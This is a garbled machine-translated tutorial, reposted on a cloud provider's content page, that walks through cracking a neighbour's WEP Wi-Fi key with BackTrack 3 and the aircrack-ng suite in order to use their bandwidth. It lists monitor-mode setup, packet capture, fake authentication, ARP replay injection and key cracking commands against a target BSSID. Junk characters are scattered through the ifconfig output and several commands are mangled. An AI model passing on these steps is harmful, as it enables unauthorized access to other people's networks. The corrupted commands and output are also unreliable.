Bt3 cracking tutorial (USB) cracking wireless route Password

Source: Internet
Author: User
Tags crypt bssid

Bt3 is a type of Linux, like redlinux, like red-flag Linux. However, this bt3 integrates a large number of hacking tools, especially those that break through the wireless network.
If you want to break the Web or WPA's encrypted wireless network and get rid of the Internet bandwidth, you may wish to study this, which is very interesting.
In addition, the current bt2 web cracking has evolved to a few minutes. Even if only the AP is working, the other client can be broken even if it is not connected to the other client.

Enter the full screen mode of the VM.
After the boot is successful, enter the User name: Root Password: toor
Enter flux in window mode.

Right-click any desktop location, select xterm from the context menu, and open a console window.
Input command: ifconfig-a press ENTER
If there is a network card device named rausb0, your device can be captured and cracked by the table name.
Try it.

 

1. Start the USB flash drive: Download The backtrack3 (bt3) USB Version. Put the boot and bt3 folders in the root directory of the USB flash drive, and double-click the boot folder to run the "bootinst. Bat" batch file. There will be four more files in the USB flash drive. "isolinux. Boot" "isolinux. cfg" "isolinux. bin" "syslinux. cfg"

2. restart Windows to enter BIOS settings, set the frist boot device in BIOS to USB-HDD (or USB--ZIP) and then restart from USB boot. The system enters the backtrack3 system.

3. Start cracking now

1. Enter the ifconfig command in the shell window and the following information is displayed:
Lo no wireless extensions.
Eth0 no wireless extensions.

Eth1 IEEE 802.11g Essid: "" nickname :""
Mode :( ......) frequency: 2.452 GHz Access Point: 00: 0f: B5: 88: AC: 82
Bit Rate: 0 kb/s TX-Power: 18 dBm sensiti.pdf = 0/

Retry: Off RTS thr: Off fragment thr: Off
Encryption key: off \ XR \ db'
Power Management: Off I) l3_h.q
Link quality = 0/94 signal level =-95 dBm noise level =-95 dBm $ XKB auyj
RX invalid nwid: 0 RX invalid crypt: 0 RX invalid frag: 0 46g K
"
TX excessive retries: 0 invalid MISC: 0 missed Beacon: 0 dvbb success |! SK
2. Find out your wireless network card name. Here I am eth1. then start your network card in moniter mode (enter airmon-ng start eth1 11 ). Enter the ifconfig command and return the following information: UW # g1v/

 


Lo no wireless extensions. 'dchqhg}
Eth0 no wireless extensions. CX >$ % | D
Eth1 IEEE 802.11g Essid: "" nickname: "" J 1] f grlj
Mode: Monitor frequency: 2.452 GHz Access Point: 00: 0f: B5: 88: AC: 82 BWV @ * 0
Bit Rate: 0 kb/s TX-Power: 18 dBm sensiti.pdf = 0/3, +? B8.-%
Retry: Off RTS thr: Off fragment thr: off G = ("" WZ
Encryption key: Off Q: D? T1 ^
Power Management: off [$ b7jkp "9
Link quality = 0/94 signal level =-95 dBm noise level =-95 dBm] UJ % vZs \
RX invalid nwid: 0 RX invalid crypt: 0 RX invalid frag: 0. P? BZ
TX excessive retries: 0 invalid MISC: 0 missed Beacon: 0 v6e @ dkx7

 

3. Enter the command airodump-ng-C 11 -- bssid 00: 1A: 01: 8d: C3: B2-W outputs eth1. TB: _ 8zp8
In the command, "11" indicates the channel number to be cracked, "bssid" indicates the Mac physical address of the target, and "outputs" indicates the name of the package to be generated. Press enter to run.
4. open another shell and enter aireplay-ng-1 0-e targetnet-a 00: 1A: 01: 8d: C3: B2-h 00: A1: C1: D8: A5: B6 eth1.
"Targetnet" indicates the target network name to be cracked. 00: 1A: 01: 8d: C3: B2 indicates the physical address of the target Mac, 00: A1: C1: D8: a5: B6 indicates the MAC address of the local Nic
5. open another shell and enter aireplay-ng-3-B 00: 1A: 01: 8d: C3: B2-h 00: A1: C1: D8: A5: B6 eth1 onqb % YC
Obtain more data packets.
6. When the returned data volume reaches 10 thousand, it can be cracked. Open another shell and input aircrack-ng-z-B 00: 1A: 01: 8d: C3: B2 outputs. Cap to crack the program. If the attack fails, let the attacker continue to capture packets until the attack fails.

Source: chinadu's blog

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.